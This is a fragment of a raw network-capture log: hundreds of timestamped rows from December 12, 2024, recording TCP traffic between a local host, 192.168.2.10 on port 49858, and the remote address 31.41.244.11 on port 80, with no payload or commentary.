                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.052071095 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.052109003 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.052249908 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.053365946 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.053556919 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.053602934 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.053673029 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.054977894 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.055082083 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.055145979 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.055330038 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.056612015 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.056673050 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.056688070 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.056816101 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.058362007 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.058391094 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.058619022 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.058619022 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.059966087 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.060062885 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.060117960 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.060168028 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.061475039 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.061526060 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.061589003 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.061659098 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.063015938 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.063055992 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.063088894 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.063121080 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.064642906 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.064816952 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.064837933 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.064909935 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.066263914 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.066318989 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.066351891 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.066443920 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.067941904 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.068032026 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.068109035 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.068178892 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.069458961 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.069550991 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.069597960 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.069597960 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.071088076 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.071172953 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.071331024 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.071331024 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.072712898 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.072810888 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.072875977 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.073110104 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.074264050 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.074306965 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.074376106 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.074434042 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.077685118 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.077754974 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.077768087 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.077816963 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.077852011 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.077857971 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.077857971 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.077990055 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.079123020 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.079174995 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.079255104 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.079336882 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.080774069 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.080810070 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.080832958 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.080918074 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.082355976 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.082432985 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.082515955 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.082762003 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.083952904 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.084009886 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.084151030 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.084238052 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.085536003 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.085608006 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.085632086 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.085771084 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.196988106 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.197010994 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.197149992 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.197649002 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.197719097 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.197772980 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.197858095 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.199034929 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.199064016 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.199281931 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.199281931 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.200479031 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.200535059 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.200572968 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.200620890 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.201919079 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.202004910 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.202007055 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.202275038 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.203176975 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.203246117 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.203346014 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.203346014 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.204688072 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.204814911 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.204844952 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.205049038 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.205936909 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.205991030 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.206010103 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.206052065 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.207289934 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.207349062 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.207389116 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.207442045 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.208666086 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.208755970 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.208867073 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.208867073 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.209899902 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.209968090 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.210103989 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.210174084 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.211489916 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.211559057 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.211680889 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.211752892 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.213130951 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.213193893 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.213210106 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.213262081 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.214210987 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.214255095 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.214282036 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.214309931 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.215250015 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.215338945 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.215390921 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.215519905 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.216351986 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.216453075 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.216547012 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.216830969 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.217770100 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.217860937 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.217992067 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.217992067 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.218911886 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.218965054 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.219067097 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.219067097 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.220237970 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.220316887 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.220354080 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.220354080 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.221545935 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.221618891 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.221636057 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.221688986 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.222892046 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.222955942 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.223068953 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.223068953 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.224195957 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.224256039 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.224263906 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.224483967 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.225421906 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.225552082 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.225573063 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.225640059 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.226722002 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.226780891 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.226866961 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.226950884 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.228043079 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.228105068 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.228213072 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.228610992 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.229321957 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.229465008 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.229480028 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.229564905 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.230590105 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.230724096 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.230871916 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.230871916 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.231904984 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.231995106 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.232276917 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.232276917 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.233247995 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.233433962 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.234148979 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.234148979 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.234500885 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.234602928 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.234802961 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.234802961 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.235781908 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.235868931 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.235938072 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.235938072 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.237108946 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.237227917 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.237308979 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.237308979 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.238379955 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.238456964 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.238514900 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.238648891 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.239805937 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.239948034 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.240221024 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.240221024 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.240942955 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.240987062 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.241056919 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.241056919 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.242284060 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.242371082 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.242433071 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.242433071 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.243554115 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.243662119 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.243699074 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.243732929 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.244904995 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.245043993 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.245078087 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.245356083 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.246166945 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.246251106 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.246289968 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.246464014 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.247469902 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.247534990 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.247728109 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.247983932 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.248750925 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.248866081 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.249486923 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.249486923 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.250036001 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.250066042 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.250372887 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.250372887 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.251307964 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.251386881 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.251401901 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.251482010 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.252597094 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.252702951 CET4985880192.168.2.1031.41.244.11
